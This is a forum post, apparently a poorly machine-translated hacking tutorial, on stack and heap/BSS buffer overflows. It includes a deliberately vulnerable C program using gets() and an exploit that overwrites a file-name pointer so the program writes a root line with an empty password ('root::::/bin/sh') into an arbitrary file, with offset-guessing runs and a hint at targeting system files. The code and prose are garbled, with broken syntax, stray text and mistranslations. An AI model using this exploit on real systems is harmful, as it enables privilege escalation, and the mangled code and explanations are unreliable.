Forum Thread: Exploiting Heap Overflow for Beginners -by Mohamed Ahmed.

Something simple: overflows for nerds.
Well, we are in front of a computer that is running a program
and we ask ourselves " Why does this machine work? " The truth is that
explaining how it does what the processor does is a bit complex (I got myself to
understand it 4 months of a subject a hard rock ;)but we can
make a rough summary of it: we have a processor that, as its
own name indicates, it only processes the data that is in the memory (or
the hard disk, etc.). "And how does the processor know how to
process a certain data?";
using preprogrammed binary codes which is the next instruction
to execute and with which data it must do it. "And how does the processor know that what
is being processed is a data and not another instruction of the program that should
execute?"; because that the processor does not know, and precisely this fact is what
we are going to take advantage of for our malefic purposes.

Let's see, the memory of a computer, as you all know, is simply a
bunch of records in which you can store 0 or 1's. It consists of nothing
more than that. For example, if we take a very small portion of memory
and see what it contains, it surely looks like this:
--------------------------------------------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
--------------------------------------------------------------------------------------------------------

and what it means to mean all this series of digits is this:
--------------------------------------------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
--------------------------------------------------------------------------------------------------------
instruction | data | data | instruction | instr ...

Since the time of the first computers there was the idea of ??putting
a label (one bit more) in each dataset to differentiate whether the
set in question was an instruction or a data; but at that time
put a bit more was quite expensive and the results of the programs
would be done much more slowly when processing a bit more. In addition, Von Neumman
(a guy who owes much of the concepts of
current computers ) had demonstrated years ago that with a good organization of the
processor and a well-ordered access to memory, there was no need to differentiate
between instructions and data that the processor would respond to a
instruction and would take the data indicated by the instruction,
and as the instruction will always point to a memory area in which
are your data, there was no problem.

Surely the instruction will always point to a memory area
where your data will be? Well .... that would have to be discussed ....
Let's see the stupid example of stack overflow that exists. We have a
variable (that is, one of the 'data' of the instruction) and we execute something
as simple as the programilla this:

code
......
main ()
{
char data20;
....
scanf ("% s", & data);
....
}
....

and the memory would be more or less like this (the x's represent instructions):

.... xxxx | 0000000000 ... 0000000000 | xxxxx ...... xxx | xxxxxxx ...... xxxxxxx | .....

^ ^
the data variable 20 the scanf instruction

as nothing, we already have the game ready. The normal thing is that
when the user is told to enter the text in question to fill in the
data variable 20, they will enter less than 20 characters and then there is no problem; but the
problem appears when you give to put some more. It turns out that the
C language does not check for limits when executing instructions like these, so
what it does is simply to continue accepting characters and saving them in
memory locations adjacent to the data variable 20, more or less
like this:

Case 1:
the user is good people
-------------------------------------------------- --------------------------------
..... I am med0000000000000 | xxxxxxxxxxxxx ... xxxx | .....
-------------------------------------------------- --------------------------------
case 2:
the user is a jaquerrr wanting to do something illegal
----------------------------------------------------------------------------------
..... I am a mohamed jaj | ajajajaxxxxxxxx ... xx | .....
----------------------------------------------------------------------------------
Here we see how the first bits of the
following instruction have been overwritten 20. The normal thing that happens in these cases is that the
processor, when trying to execute that instruction that of course does not match
any valid, of an error and finish the execution of the program.

However, the trick is to overwrite the instruction that follows
data 20 to be something the processor understands. The most usual thing is that it
is overwritten with a jump to another memory location where we have
previously placed a call to a shell so that, instead of executing the
command, a shell is executed that would give us access to the system.
Graphically:

.................................................. ......
................ data20saltoxxxxxxxx ..................
.................................................. ......
.................................................. ......
.................................................. ......
shell

and we will finish executing the program with a brand new shell just
invoked :).

Well, I do not dwell on the subject of overflows;
I suppose you all got the idea. Everything I have said so far
refers to stacks overflows, of which there is a lot of articles
written in both Spanish and Yanki-language, so if you are interested,
you just have to move around the world ... (and not much, this ezine brings all ;)

Heaps overflows.
the previous paragraphs have seen the base of a stack overflow. There
is very complex but has certain curiosities that must be taken into account
account, as for example to find return addresses in the calls
to functions and things like (to know more, the best thing is that you are loyal the
different artists published on the subject). I defend the heaps overflows
for its simplicity and its "purity of lines", as some bad
car advertisement would say. ;)

Of course, to understand what a Heap Overflow is, the first thing
to know is what the Heap is ;). Let's see, a program has two
ways to ask the OS memory to do its job. One of them is the
typical one, which we used before:

char data 20,

so the system would allocate a memory zone identifying it with the
name "data" and size 20 bytes. This is the traditional and
"static" form, that is, if at any point in the program we need
the variable data to be 40 bytes, we can not do it.

The other way, and it is the one that interests us, is that the program asks at
runtime (the other form is called "at compile time") the memory
it needs, then the OS searches for free memory and, if available, is
given to the program. Usually this is done with:

Code:
char * data;
data = (char *) malloc (SIZEofMEMORY);

and the system would return the assigned memory zone in "data" or, if there is no
free, would put data to NULL. Here we see that the variable "data" is no
longer a variable in the "classic" sense of the word and happens to be a
pointer that, as its name indicates, it does point to the first
of a series of positions by heart.

Someone should already be asking "if an overflow consists of
overwriting a memory zone, how will the OS be so silly as to
give us malloc () access to a memory zone that is already being
occupied?". Very simple: the OS is not silly. Well, not quite :). The OS
simply does what we say within limits, so
it will never give us positions that are already used, but nothing prevents us from
moving ourselves through those positions. What we have to take into
account is that, since C does not check that we are writing in
the memory position assigned to us by the OS (if you do not check limits on
variables, the logic is that you do not check things like these either because
two concepts are based on the same thing: write in a site that was not
intended for you), we will always be able to write in another that is
a valid position. That is, if we have 2 memory zones (no
need to be consecutive) allocated for two variables, the OS will
allow to write in the second using the first, and vice versa, for the simple
reason that both the first and the second point to areas of memory that
have been identified as "writable" by that type of variables. Let's
see it with an example that is very clear:

code
<++> heap / example1.c 92ca44fdc06aa8f1d800ecf7fe6309
/ *

  • the simplest possible example of an overflow in the heap zone
  • based directly on one of w00w00
  • /

#include
#include
#include

int main ()
{
char data1, data2; / our variables /
unsigned long distance; / * this is the actual memory distance
that are going to have our variables.
if the 2 were in memory zones
consecutive, the distance would be 0 * /

/ request memory allocation. Let's ask for 40 bytes /
dato1 = (char *) malloc (40);
dato2 = (char *) malloc (40);

/ we look at how far they are /
distance = (unsigned long) dato2 - (unsigned long) dato1;

/ * now we fill data2 with a normal chain. memset ()
the only thing that does is fill the position of memory q is passed
with a character * /

memset (dato2, 'P', 40-1), dato2 40-1 = '{jumi * 3 oooooooooooooooolink exploitooooooooooooooooooooooooo }';

printf ("before overwriting:% s \ n", data2);

/ * we overwrite 20 bytes of data2 using the variable data1 and the
distance separating them (just in case this is not 0) * /

memset (data1, '*', (unsigned int) (distance + 20));

/ we checked /
printf ("after overwrite:% s \ n", data2);

return 0;
}
<-->

As we already have it, we execute it and we see how the data pointer1 overwrites
the area that has assigned data2; and the OS allows it for the simple reason
that both zones (the one of data2 and the one that is supposed to use
data1) are of the same type and are initialized in the same way, and since
C does not check the addresses because it is easy to confuse it so that it thinks that
data1 is being written in its place when in fact we are in the data
zone2.

code
...
cafo @ thehost: ~ / nets / heap $ ./example1
Before Overwriting: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
after overwriting: ********** PPPPPPPPPPPPPPPPPPP
...

Then the concept has become quite clear, right? We only need
a pointer that is in the heap zone that we can handle to be able
to access all the other pointers in that zone.

Well, both roll over the heap zone and still have not explained what it is. ;)
Heap is simply a zone of dynamic memory where you store
variables by means of the call to malloc (). Possibly those who have
read some book on SO architecture and others, sound the couple
HEAP / BSS. The BSS (and I swear that I have not been able to find anywhere that is what
those damn acronyms mean ;)is simply the memory area
where the global variables are not initialized and the
declared as 'static'. For example, if we want to have memory without
having to initialize it but we want it to behave like the pointer we
used before, we can write something like this:

static char dato1 40;

and would be the equivalent in the zone BSS to the call to malloc () that we did in
the previous programilla.

Well, once you get to this point more than one will ask "And this so
that it serves me?". Well the truth is that if you ask that is that
you still need to catch enough practice with that of the exploits ;). Well, seriously.
You simply have to find a source code (quite usual in these
open source times ...) that uses one of these variables that I have commented
and that allows the user to write it. The typical situation is that the
programmer uses one of these pointers to request data from the user.

Imagine that we have a program that all you do is write what
we tell you in a file that we can not choose. Something like this:

code
<++> heap / example2.c $ d102f90f44986e093acb7a01aef6d723
/ *

  • example2.c Displays a vulnerable program in the BSS zone
  • /

#include

int main ()
{
FILE * file;
static char dato1 16, * tmpfile;

tmpfile = "/ tmp / mama.txt"; / we put a temporary any /
printf ("before exploit:% s \ n", tmpfile); / to ensure... /

printf ("Data to be entered in breast.txt: \ n");
gets (data1);

printf ("\ nafter the exploit:% s \ n", tmpfile);
file = fopen (tmpfile, "w");

fputs (data1, file);
fclose (file);
}
<-->

Well, we already have the program in question. At a glance it is not vulnerable
because the only thing that can be modified "externally" is what is written in
the file "mama.txt" so we would not have any problems with
system security , right? I hope so, because we can use what we said before
overwriting pointers for the program to do certain things
undesirable, such as overwriting system files or things like that, and we
can always find files that are useful when overwriting, right?

Well the trick in this case is that the variable where the
name is stored is a pointer whereas where we save the data we
want to put in the file is in the BSS zone, which allows us
play a little with directions. The only thing we have to do is start
testing different approaches to "* tmpfile" from "data1" until we can
completely overwrite the position of * tmpfile with the address of a
file that we are interested in writing. Let's look at an example:

code
<++> heap / exploit2.c $ cc2e106df958188984666213aa549c49
/ * exploit for program example2.c

  • the original is still in w00w00;)
  • /

#include
#include
#include
#include

#define BUFSIZE 256
#define ERROR -1

#define DIFF 16

#define VULPROG "./example2"
#define VULFILE "/ tmp / mierdapami"

u_long getesp ()
{
_asm _ ("movl% esp,% eax");
}

int main (int argc, char * argv)
{
u_long addr;

register int i;
int mainbufsize;

char * mainbuf, buf DIFF + 6 + 1 = "+ + \ t #";

memset (buf, 0, sizeof (buf)), strcpy (buf, "root :::: / bin / sh \ t #");

memset (buf + strlen (buf), 'A', DIFF);
addr = getesp () + atoi (argv 1);

for (i = 0; i <sizeof (u_long); i ++)
buf DIFF + i = ((u_long) addr >> (i * 8) & 255);

mainbufsize = strlen (buf) + strlen (VULPROG) +
strlen (VULPROG) + strlen (VULFILE) + 13;

mainbuf = (char *) malloc (mainbufsize);
memset (mainbuf, 0, sizeof (mainbuf));

snprintf (mainbuf, mainbufsize-1, "echo '% s' |% s% s \ n",
buf, VULPROG, VULFILE);

system (mainbuf);
return 0;
}
<-->

Well, nothing, here we have a seemingly innocent program like this,
is able to write what we want in any place where
we have writing privileges. We only have to try
different offsets until we overwrite the complete path:

code

code ..
cafo @ thehost: ~ / nets / heap $ ./exploit2 500
before the exploit: /tmp/mama.txt
Data to be entered in breast.txt:

after the exploit: G = spanish
...

ups, we have gone to the area of the environment variables (I did not say that this
kind of exploit can be really useful? ;). Let's continue testing (this more or
less is the game of "sink the fleet" but we have the trick that
We can test millions of values per minute, right? :)

...
cafo @ thehost: ~ / nets / heap $ ./exploit2 400
before the exploit: /tmp/mama.txt
Data to be entered in breast.txt:

after the exploit: üÿ¿
...

Dish, we have gone to the executable code. Too low. Water ;)

...
cafo @ thehost: ~ / nets / heap $ ./exploit2 450
before the exploit: /tmp/mama.txt
Data to be entered in breast.txt:

after the exploit: mplo2
...

/ code

this already sounds better. It is the name of the vulnerable program, so we assume
that we can be in argv 0, right? Water still.

...
cafo @ thehost: ~ / nets / ./exploit2 heap $ 465
before Exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after Exploit: dapami
...

good good good , this is much better. We have just found our
string pointing to the file we want to overwrite. TOUCHED!. Counting
on the fingers it turns out that

code
cafo @ thehost: ~ / nets / heap $ ./exploit2 456
before the exploit: /tmp/mama.txt
Data to enter in breast.txt

after the exploit:

Code:
/ tmp / mierdapami

...

SAND !!! If everything went well, we have in our tmp directory that
file with the info we wanted it to have. Let's see:

...

code
cafo @ thehost: ~ / nets / heap $ cat / tmp / mierdapami
root :::: / bin / sh
cafo @ thehost: ~ / nets / heap

interesting, right? Too bad that same line was not somewhere else ...
but nothing, as this is not for you to do bad things, I let you
investigate.

So far everything has gone very well. Of course, for now we have only
been with my programs, that is, I knew by writing them that they would
be vulnerable. The next thing would be to find out what kind of programs
may be vulnerable or what kind of variables are typically overwritten
by the exploits, but we'll leave that for the second part of the article ...

greetings

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active